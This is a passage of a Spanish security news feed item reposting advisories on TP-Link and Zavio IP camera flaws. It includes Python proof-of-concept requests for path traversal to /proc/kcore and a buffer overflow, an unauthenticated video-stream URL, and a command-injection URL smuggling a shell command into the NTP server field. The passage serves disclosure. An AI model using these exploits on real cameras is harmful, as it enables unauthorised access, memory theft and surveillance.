credenciales válidas de usuario.&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-1605"&gt;CVE-2013-1605&lt;/a&gt;: un fallo de desbordamiento de memoria podría permitir la ejecución de código arbitrario de forma remota.&lt;/li&gt;&lt;br /&gt;&lt;/ul&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Los investigadores han publicado dos sencillas PoC escritas en python para probar estos dos fallos:&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;ul&gt;&lt;br /&gt;&lt;li&gt;Para obtener un &lt;b&gt;volcado de la memoria del dispositivo&lt;/b&gt; (&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-1604"&gt;CVE-2013-1604&lt;/a&gt;).&lt;/li&gt;&lt;br /&gt;&lt;/ul&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="background: white;"&gt;&lt;br /&gt;&lt;b style="font-family: 'Courier New'; font-size: 13px;"&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt; &lt;b style="font-family: 'Courier New'; font-size: 13px;"&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;import&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; httplib&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="background: white;"&gt;&lt;br /&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;b&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;conn &lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;=&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; httplib&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;.&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;HTTPConnection&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;(&lt;/span&gt;&lt;span lang="EN-GB" style="color: #0000e6; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;"DIRECCIÓN_IP"&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;b&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;conn&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;.&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;request&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;(&lt;/span&gt;&lt;span lang="EN-GB" style="color: #0000e6; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;"GET"&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;,&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; &lt;/span&gt;&lt;span lang="EN-GB" style="color: #0000e6; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;"/../../../../../../../../../proc/kcore"&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;)&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="background: white;"&gt;&lt;br /&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;b&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;resp &lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;=&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; conn&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;.&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;getresponse&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;()&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="background: white;"&gt;&lt;br /&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;b&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;data &lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;=&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; resp&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;.&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;read&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;()&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="background: white;"&gt;&lt;br /&gt;&lt;b style="font-family: 'Courier New'; font-size: 13px;"&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;conn&lt;/span&gt;&lt;span style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;.&lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;close&lt;/span&gt;&lt;span style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;()&lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;ul&gt;&lt;br /&gt;&lt;li&gt;Para causar un &lt;b&gt;desbordamiento de memoria&lt;/b&gt; y conseguir que el registro '&lt;i&gt;Instruction Pointer&lt;/i&gt;' sea sobrescrito con el valor 0x61616161 (&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-1605"&gt;CVE-2013-1605&lt;/a&gt;).&lt;/li&gt;&lt;br /&gt;&lt;/ul&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="background: white;"&gt;&lt;br /&gt;&lt;b style="font-family: 'Courier New'; font-size: 13px;"&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;import&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; httplib&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="background: white;"&gt;&lt;br /&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;b&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;conn &lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;=&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; httplib&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;.&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;HTTPConnection&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;(&lt;/span&gt;&lt;span lang="EN-GB" style="color: #0000e6; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;"DIRECCIÓN_IP"&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;)&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="background: white;"&gt;&lt;br /&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;b&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;conn&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;.&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;request&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;(&lt;/span&gt;&lt;span lang="EN-GB" style="color: #0000e6; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;"GET"&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;,&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; &lt;/span&gt;&lt;span lang="EN-GB" style="color: #0000e6; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;"/"&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; &lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;+&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; &lt;/span&gt;&lt;span lang="EN-GB" style="color: #0000e6; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;"A"&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; &lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;*&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; &lt;/span&gt;&lt;span lang="EN-GB" style="color: #008c00; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;3000&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; &lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;+&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; &lt;/span&gt;&lt;span lang="EN-GB" style="color: #0000e6; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;".html"&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;)&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="background: white;"&gt;&lt;br /&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;b&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;resp &lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;=&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; conn&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;.&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;getresponse&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;()&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="background: white;"&gt;&lt;br /&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;b&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;data &lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;=&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; resp&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;.&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;read&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;()&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="background: white;"&gt;&lt;br /&gt;&lt;b style="font-family: 'Courier New'; font-size: 13px;"&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;conn&lt;/span&gt;&lt;span style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;.&lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;close&lt;/span&gt;&lt;span style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;()&lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Las vulnerabilidades han sido comprobadas en dispositivos con firmware v09.27 ó 2011.27.09, aunque otras versiones también podrían verse afectadas.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;La respuesta del fabricante es que &lt;b&gt;las vulnerabilidades han sido corregidas&lt;/b&gt; en el firmware 2013.22.04.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;table cellpadding="0" cellspacing="0" style="float: right; margin-left: 1em; text-align: right;"&gt;&lt;tbody&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-cKXw_FTuBJM/UaiNiWJDipI/AAAAAAAAClQ/vDNAaKEKKcs/s1600/Zavio_ip_camera.png" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="200" src="http://3.bp.blogspot.com/-cKXw_FTuBJM/UaiNiWJDipI/AAAAAAAAClQ/vDNAaKEKKcs/s1600/Zavio_ip_camera.png" width="144" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;Zavio F3105&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;Por último, &lt;a href="http://www.coresecurity.com/advisories/zavio-IP-cameras-multiple-vulnerabilities"&gt;los dispositivos del fabricante Zavio&lt;/a&gt; basados en el firmware v1.6.03 se ven afectados por las cuatro vulnerabilidades siguientes:&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;ul&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-2567"&gt;CVE-2013-2567&lt;/a&gt;: un atacante remoto podría utilizar los credenciales fijados en el fichero de configuración '&lt;i&gt;boa.conf&lt;/i&gt;' para acceder a la interfaz web de administración.&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-2568"&gt;CVE-2013-2568&lt;/a&gt;: un error de falta de comprobación de parámetros de entrada en '&lt;i&gt;/cgi-bin/mft/wireless_mft.cgi&lt;/i&gt;' podría permitir la inyección de comandos de forma remota.&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-2569"&gt;CVE-2013-2569&lt;/a&gt;: un atacante remoto no autenticado podía tener acceso al vídeo en tiempo real.&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-2570"&gt;CVE-2013-2570&lt;/a&gt;: una inyección de comandos en la función '&lt;i&gt;sub_C8C8&lt;/i&gt;' localizada en /opt/cgi/view/param.&lt;/li&gt;&lt;br /&gt;&lt;/ul&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;La PoC de los dispositivos TP-Link es aplicable a la vulnerabilidad &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-2568"&gt;CVE-2013-2568&lt;/a&gt;.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Además, con la siguiente URL un atacante remoto no autenticado podía tener acceso al flujo de vídeo en directo (&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-2569"&gt;CVE-2013-2569&lt;/a&gt;):&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;span style="font-family: Courier;"&gt;rtsp://DIRECCIÓN_IP/video.h264&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;La última PoC es una inyección de comandos (&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-2570"&gt;CVE-2013-2570&lt;/a&gt;) a través del parámetro General.Time.NTP.Server que permite obtener una lista completa de puntos de acceso ejecutando el comando '&lt;i&gt;/sbin/awpriv ra0 get_site_survey&lt;/i&gt;':&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;a href="http://xn--direccin_ip-web/cgi-bin/admin/param?action=update&amp;amp;General.Time.DateFormat=ymd&amp;amp;General.Time.SyncSource=NTP&amp;amp;General.Time.TimeZone=GMT-06:00/America/Mexico_City&amp;amp;General.Time.NTP.ServerAuto=no&amp;amp;General.Time.NTP.Server=sarasa%21de%21palermo;/sbin/awpriv%20ra0%20get_site_survey;&amp;amp;General.Time.NTP.Update=01:00:00&amp;amp;General.Time.DayLightSaving.Enabled=on&amp;amp;General.Time.DayLightSaving.Start.Type=date&amp;amp;General.Time.DayLightSaving.Stop.Type=date&amp;amp;General.Time.DayLightSaving.Start.Month=01&amp;amp;General.Time.DayLightSaving.Stop.Month=01&amp;amp;General.Time.DayLightSaving.Start.Week=1&amp;amp;General.Time.DayLightSaving.Stop.Week=1&amp;amp;General.Time.DayLightSaving.Start.Day=01&amp;amp;General.Time.DayLightSaving.Stop.Day=01&amp;amp;General.Time.DayLightSaving.Start.Date=01&amp;amp;General.Time.DayLightSaving.Stop.Date=01&amp;amp;General.Time.DayLightSaving.Start.Hour=00&amp;amp;General.Time.DayLightSaving.Stop.Hour=00&amp;amp;General.Time.DayLightSaving.Start.Min=00&amp;amp;General.Time.DayLightSaving.Stop.Min=00&amp;amp;Image.OSD.Enabled=off"&gt;http://DIRECCIÓN_IP/cgi-bin/admin/param?action=update&amp;amp;General.Time.DateFormat=ymd&amp;amp;General.Time.SyncSource=NTP&amp;amp;General.Time.TimeZone=GMT-06:00/America/Mexico_City&amp;amp;General.Time.NTP.ServerAuto=no&amp;amp;General.Time.NTP.Server=sarasa!de!palermo;/sbin/awpriv%20ra0%20get_site_survey;&amp;amp;General.Time.NTP.Update=01:00:00&amp;amp;General.Time.DayLightSaving.Enabled=on&amp;amp;General.Time.DayLightSaving.Start.Type=date&amp;amp;General.Time.DayLightSaving.Stop.Type=date&amp;amp;General.Time.DayLightSaving.Start.Month=01&amp;amp;General.Time.DayLightSaving.Stop.Month=01&amp;amp;General.Time.DayLightSaving.Start.Week=1&amp;amp;General.Time.DayLightSaving.Stop.Week=1&amp;amp;General.Time.DayLightSaving.Start.Day=01&amp;amp;General.Time.DayLightSaving.Stop.Day=01&amp;amp;General.Time.DayLightSaving.Start.Date=01&amp;amp;General.Time.DayLightSaving.Stop.Date=01&amp;amp;General.Time.DayLightSaving.Start.Hour=00&amp;amp;General.Time.DayLightSaving.Stop.Hour=00&amp;amp;General.Time.DayLightSaving.Start.Min=00&amp;amp;General.Time.DayLightSaving.Stop.Min=00&amp;amp;Image.OSD.Enabled=off&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;El fabricante Zavio no se ha pronunciado al respecto de las vulnerabilidades que afectan a sus dispositivos.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;b&gt;Más información:&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;TP-Link IP Cameras Multiple Vulnerabilities&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;a href="http://www.coresecurity.com/advisories/tp-link-IP-cameras-multiple-vulnerabilities"&gt;http://www.coresecurity.com/advisories/tp-link-IP-cameras-multiple-vulnerabilities&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;MayGion IP Cameras multiple vulnerabilities&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;a href="http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities"&gt;http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Zavio IP Cameras multiple vulnerabilities&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;a href="http://www.coresecurity.com/advisories/zavio-IP-cameras-multiple-vulnerabilities"&gt;http://www.coresecurity.com/advisories/zavio-IP-cameras-multiple-vulnerabilities&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div align="right" style="text-align: right;"&gt;&lt;br /&gt;Juan José Ruiz&lt;/div&gt;&lt;br /&gt;&lt;div align="right" style="text-align: right;"&gt;&lt;br /&gt;&lt;a href="mailto:jruiz@hispasec.com"&gt;jruiz@hispasec.com&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;img height="1" src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/hdag0zlJOzI" width="1" /&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/multiples-vulnerabilidades-en.html</link><author>noreply@blogger.com (El Bio Gamer)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" 